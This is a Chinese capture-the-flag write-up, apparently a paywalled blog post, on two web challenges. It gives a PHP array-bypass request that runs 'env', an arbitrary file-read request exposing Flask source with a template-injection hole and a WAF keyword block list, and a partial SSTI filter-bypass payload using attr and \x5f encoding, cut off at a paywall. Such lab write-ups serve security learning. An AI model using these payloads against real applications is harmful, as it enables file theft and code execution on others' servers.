ezphp
直接数组绕过, 执行命令
GET: usn[]=1&usn1[]=1&sign=env
POST: pwd[]=2&pwd1[]=2
ez_python
file参数任意文件读取
读取源码: ?file=app.py
from flask import Flask, request, render_template_string
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
import waf
app = Flask(__name__)
# Rate limiting: 300 requests per day, 75 per hour
limiter = Limiter(get_remote_address, app=app, default_limits=["300 per day", "75 per hour"])
@app.route('/')
@limiter.exempt # Exempt the index route from rate limiting
def index():
file_path = request.args.get('file')
if file_path and "proc" in file_path:
return "只过滤了proc,别想用这个了,去读源码", 200 # Message in Chinese: "Only filtered 'proc', don't think about using this, read the source code"
if file_path:
try:
with open(file_path, 'r') as file:
file_content = file.read()
return f"{
file_content}"
except Exception as e:
return f"Error reading file: {
e}"
return "Find the get parameter to read something"
@app.route('/shell')
@limiter.limit("10 per minute") # Rate limit: 10 requests per minute
def shell():
if request.args.get('name'):
person = request.args.get('name')
if not waf.waf_check(person):
mistake = "Something is banned"
return mistake
template = 'Hi, %s' % person
return render_template_string(template)
some = 'who you are?'
return render_template_string(some)
@app.errorhandler(429) # Custom handler for 429 Too Many Requests
def ratelimit_error(e):
return "工具? 毫无意义,去手搓", 429 # Message in Chin
审计一下代码, 很明显的ssti模板注入,
根据前面的 import waf 可知道存在一个waf文件, 读取它 ?file=waf.py
def waf_check(value):
dangerous_patterns = [
'os', 'set', '__builtins__', '=', '.', '{
{', '}}', 'popen', '+', '__'
]
for pattern in dangerous_patterns:
if pattern in value:
return False
return True
简单绕过一下就行, 有挺多种方法的
用attr绕过点 . \x5f\x5f 编码绕过__
?name={
%print(%22%22|attr(%22\x5f\x5fclass\x5f\x5f%22)|attr(%22\x5f\x5fbase\x5f\x5f%22)|attr(%22\x5f\x5fsubclasses\x5f\x5f%22)()|attr(%22\x5f\x5fgetitem\x5f\x5f%22)
最低0.47元/天 解锁文章
扫一扫
9722
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
